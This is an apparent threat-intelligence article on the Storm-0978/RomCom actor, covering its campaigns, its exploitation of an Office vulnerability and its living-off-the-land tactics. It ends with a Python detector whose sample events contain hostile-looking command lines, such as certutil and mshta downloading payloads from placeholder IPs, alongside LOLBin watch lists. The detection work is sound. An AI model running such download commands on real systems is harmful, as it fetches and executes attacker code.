Storm-0978 is the name Microsoft uses for a threat actor that has been linked to a series of high-profile cyber-espionage and extortion campaigns. But who are they, and what are their motives? Let's delve into the storm.
The Identity of Storm-0978
Storm-0978, as it's known in the cybersecurity community, is a capable and well-organized group. Microsoft assesses it to be based in Russia; other vendors track the same actor under different names, most prominently RomCom (the name BlackBerry uses, after the backdoor the group deploys). Its tactics, techniques, and procedures (TTPs) point to a well-resourced and organized operation.
Microsoft Threat Intelligence has been tracking Storm-0978's activities and has noted the group's dual nature: it runs opportunistic ransomware and extortion-only operations, and it also runs targeted credential-gathering campaigns that appear to support intelligence collection. The same toolset serves both ends, which is unusual for a single actor.
The Motives: Espionage and Financial Gain
Storm-0978's motives appear to be twofold. On one hand, the group is engaged in cyber espionage, targeting government and defense organizations in Europe and North America to gather intelligence. On the other hand, it is also driven by financial gain, pursued through ransomware and extortion operations; Microsoft has observed that activity against organizations in the telecommunications and finance sectors, among others.
The group's most notable campaign, observed in June 2023, used lures referencing the Ukrainian World Congress and the NATO summit held in Vilnius in July 2023 to target defense and government entities in Europe and North America. BlackBerry researchers, who track the actor as RomCom, reported the campaign; Microsoft attributed it to Storm-0978 and tied it to exploitation of CVE-2023-36884, a then-unpatched remote code execution vulnerability in Office and Windows, with the malicious documents delivering the RomCom backdoor. Spear-phishing with carefully tailored lures is a hallmark of this group, as it is of APT groups generally.
The Tactics: A Blend of Old and New
Storm-0978's modus operandi is a blend of traditional and innovative tactics. For initial access the group sends spear-phishing emails carrying malicious documents, and it distributes trojanized installers of popular software (Adobe products, Advanced IP Scanner, Signal and KeePass among them) from lookalike domains. Once inside, it deploys the RomCom backdoor to maintain access and move laterally within the network; in extortion operations this is followed by ransomware, notably the Underground family, which shares code with Industrial Spy.
Like many intrusion sets, Storm-0978 also relies on living-off-the-land (LOTL) techniques. The operators leverage legitimate tools and processes already present in the victim's environment to avoid detection and blend in with normal administrative activity. Because the binaries themselves are legitimate, detection hinges on context: which parent process launched the tool, what it loaded, and from where.
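To make the context-based detection idea concrete, here is an added example of a small scoring detector run over constructed process-creation events. This is illustrative code written for this article, not tooling from Microsoft, BlackBerry or the actor; the sample events, the parent and LOLBin lists and the score weights are all hypothetical and would need tuning against a real environment's baseline. The point it shows is that a legitimate binary such as rundll32.exe or certutil.exe is unremarkable on its own and only becomes suspicious in combination with a document-handling parent, remote content in the command line, or a payload in a user-writable path.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Constructed sample process-creation events for this example (not a real
# capture); the field shape loosely follows a Sysmon Event ID 1 summary line.
SAMPLE_EVENTS = [
    "parent=WINWORD.EXE child=rundll32.exe cmd=rundll32.exe C:\\Users\\a\\AppData\\Local\\Temp\\upd.dll,Start",
    "parent=explorer.exe child=rundll32.exe cmd=rundll32.exe shell32.dll,Control_RunDLL",
    "parent=OUTLOOK.EXE child=mshta.exe cmd=mshta.exe http://198.51.100.7/a.hta",
    "parent=services.exe child=certutil.exe cmd=certutil.exe -urlcache -split -f http://203.0.113.9/d.bin d.bin",
    "parent=cmd.exe child=certutil.exe cmd=certutil.exe -verify cert.cer",
    "parent=svchost.exe child=wmiprvse.exe cmd=wmiprvse.exe -Embedding",
]

EVENT_RE = re.compile(r"parent=(\S+)\s+child=(\S+)\s+cmd=(.*)")

# Hypothetical tuning lists; a real deployment derives these from its own baseline.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe"}
LOLBINS = {"rundll32.exe", "mshta.exe", "certutil.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "powershell.exe", "msiexec.exe"}
# URL, certutil's download switch, or a UNC path: the command pulls remote content.
REMOTE_CONTENT = re.compile(r"https?://|-urlcache|\\\\[\w.-]+\\", re.IGNORECASE)
# Locations a low-privilege user can write to, where dropped payloads tend to live.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    parent: str
    child: str
    cmd: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def score_event(line: str) -> Optional[Finding]:
    """Score one event line; returns None if it does not parse."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    parent, child, cmd = m.group(1).lower(), m.group(2).lower(), m.group(3)
    f = Finding(parent, child, cmd)
    if child in LOLBINS:
        f.score += 1
        f.reasons.append("lolbin child")
    if parent in USER_FACING_PARENTS:
        f.score += 2
        f.reasons.append("spawned by document/browser application")
    if REMOTE_CONTENT.search(cmd):
        f.score += 2
        f.reasons.append("loads remote content")
    if USER_WRITABLE.search(cmd):
        f.score += 1
        f.reasons.append("payload in user-writable path")
    return f


def triage(lines: Iterable[str]) -> List[Finding]:
    """Return the events whose combined context crosses the alert threshold."""
    scored = (score_event(line) for line in lines)
    return [f for f in scored if f is not None and f.score >= ALERT_THRESHOLD]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"score={f.score} {f.parent} -> {f.child}: {', '.join(f.reasons)}")
```

Run as a script it prints three alerts: Word spawning rundll32 with a DLL in Temp, Outlook spawning mshta against a URL, and certutil used as a downloader. The benign rundll32 from Explorer and the certutil -verify call score too low to surface, which is the behaviour you want from a LOTL rule: score the context, not the binary name.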